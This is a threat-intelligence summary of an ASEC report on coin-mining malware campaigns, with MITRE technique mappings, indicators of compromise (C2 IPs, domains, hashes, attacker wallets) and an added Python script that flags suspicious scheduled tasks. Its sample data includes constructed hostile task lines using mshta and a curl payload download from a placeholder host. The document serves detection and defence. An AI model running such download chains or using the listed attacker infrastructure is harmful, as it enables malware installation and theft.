Attack Cases of CoinMiners Mining Ethereum Classic Coins – ASEC BLOG

The ASEC analysis tracks CoinMiners targeting Korean and overseas users, detailing cases of Ethereum Classic mining and related tooling. It covers distribution methods (Discord, dnSpy disguises), involved malware families, wallet addresses, and the broader trend of miners for ETC persisting alongside Monero-focused campaigns. #CoinMiner #EthereumClassic #dnSpy #QuasarRAT #Vidar #ClipBanker

Key Points

  • CoinMiners are deployed covertly to repurpose system resources, with Monero (XMRig) being dominant, but Ethereum/Ethereum Classic mining tools remain in use.
  • Ethereum Classic mining continues to appear in campaigns even after Ethereum’s move to Proof of Stake; ETC mining tools include lolMiner, Gminer, NbMiner, Trex, and PhoenixMiner.
  • One attack used Discord to distribute a miner disguised as a Roblox game to Korean users, installing lolMiner on victims’ systems.
  • A distribution disguised as dnSpy delivered a multi-malware loader that installs Defender Control, Quasar RAT, ClipBanker, and an Ethereum miner via a VBS/mshta workflow and scheduled tasks.
  • In ETC-focused campaigns, the loader uses Curl to download components, sets up scheduled tasks, and drops miners (lolMiner or PhoenixMiner) and other tools with actor wallet addresses.
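The loader chain in the key points above (curl download, scheduled task, VBS run through mshta) leaves a recognisable footprint in the Task Scheduler. The following detection script is an added example, not code from the ASEC article: it parses the CSV layout of `schtasks /query /fo CSV /v` (trimmed to the columns used) over constructed sample rows and flags tasks whose action matches those techniques.

```python
import csv
import io
import re

# Constructed sample rows in the column layout of `schtasks /query /fo CSV /v`,
# trimmed to the three columns used here. Not taken from the article.
SAMPLE_CSV = '''"HostName","TaskName","Task To Run"
"PC01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c -h -o -$"
"PC01","\\UpdateCheck","mshta.exe C:\\Users\\Public\\update.vbs"
"PC01","\\SysHelper","curl.exe -o C:\\Users\\Public\\m.jpg http://example.invalid/m.jpg"
"PC01","\\OneDriveStandalone","%LOCALAPPDATA%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe"
'''

# Each rule corresponds to one technique the article attributes to the loader.
RULES = {
    "T1218.005 mshta execution": re.compile(r"\bmshta(\.exe)?\b", re.I),
    "T1059.005 VBScript launch": re.compile(r"\.vbs\b|\bvbscript:", re.I),
    "T1105 curl download": re.compile(r"\bcurl(\.exe)?\b.*https?://", re.I),
}


def load_tasks(csv_text):
    """Parse schtasks CSV output into a list of dict rows."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def flag_tasks(tasks):
    """Return the tasks whose command line matches any loader-chain rule."""
    hits = []
    for task in tasks:
        cmd = task.get("Task To Run", "") or ""
        matched = [name for name, rx in RULES.items() if rx.search(cmd)]
        if matched:
            hits.append({"task": task["TaskName"], "command": cmd, "rules": matched})
    return hits


if __name__ == "__main__":
    for hit in flag_tasks(load_tasks(SAMPLE_CSV)):
        print(f"{hit['task']}: {', '.join(hit['rules'])}\n    {hit['command']}")
```

On a live host, pipe the real `schtasks /query /fo CSV /v` output into `load_tasks` and review the flagged tasks by hand; legitimate software rarely schedules mshta or curl against a remote URL.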

MITRE Techniques

  • [T1105] Ingress Tool Transfer – The malware downloads payloads using curl during installation. Quote: “curl is used for malware installation.”
  • [T1053.005] Scheduled Task – Attackers register commands in the Windows Task Scheduler to run periodically. Quote: “registers a variety of commands on the task scheduler to have them run periodically.”
  • [T1059.005] Command and Scripting Interpreter – VBScript used for download/run flow; the text notes “VBS commands are registered to the task scheduler and run with mshta.”
  • [T1218.005] Mshta – Use of mshta to execute the downloaded components. Quote: “run with mshta.”
  • [T1562.001] Impair Defenses – Defender Control is used to disable Windows Defender. Quote: “Defender Control (a Windows Defender deactivation tool).”
  • [T1115] Clipboard Data – Clipboard hijacking via ClipBanker to replace wallet addresses. Quote: “ClipBanker is a malware that checks data in the clipboard and changes it to the threat actor’s wallet address…”
  • [T1219] Remote Access Tools – Quasar RAT used as a backdoor/C2 capability. Quote: “Quasar RAT with the name (tag), ‘OldBot’ in their attacks.”
  • [T1555.003] Credentials in Web Browsers – Vidar Information Stealer extracts credentials and browser data (cookies, histories, wallet addresses). Quote: “Vidar is an Infostealer that not only steals account credentials but also various other user information including web histories, cookies, and cryptocurrency wallet addresses.”
  • [T1071.001] Web Protocols – C2/command-and-control uses web-based endpoints and URLs. (C2 addresses and web URLs listed in the article.)

Indicators of Compromise

  • [IP] C2 addresses – 149.102.129.194:22, 95.217.29.31/1758, 95.217.31.129/1758, and 3 more IPs
  • [Domain/URL] C2 and download domains – priv8note.net/r/ipcontent, mas.to/@ofadex, mas.to/@jogifoy492, steamcommunity.com/profiles/76561199436777531
  • [MD5] File hashes – 5503eec7cb0ca25f1ecb0702acd14fba, 436efede151a6b24171e4f7e7deb07bc, aa2294040015cedbf94a56845f80e144
  • [MD5] Additional hashes (examples) – 51ff42d909a879d42eb5f0e643aab806, 1b2878db748ddb13a90444ab36bae825
  • [Wallet Address] Cryptocurrency wallets – 0x66B43Cc9B4f86E2B057a733816297a24BFa547D6, 0x4dd10a91e43bc7761e56da692471cd38c4aaa426
  • [File] Dropped/related executables – m.jpg, dnscache.exe, obs.exe
  • [C2] Command/Control URLs – hxxps://priv8note.net/r/ipcontent, hxxps://mas.to/@ofadex, hxxps://mas.to/@jogifoy492
  • [Other] Vidar C2 indicators – steamcommunity.com/profiles/76561199436777531 and various IPs/URLs listed in the article

Read more: https://asec.ahnlab.com/en/46774/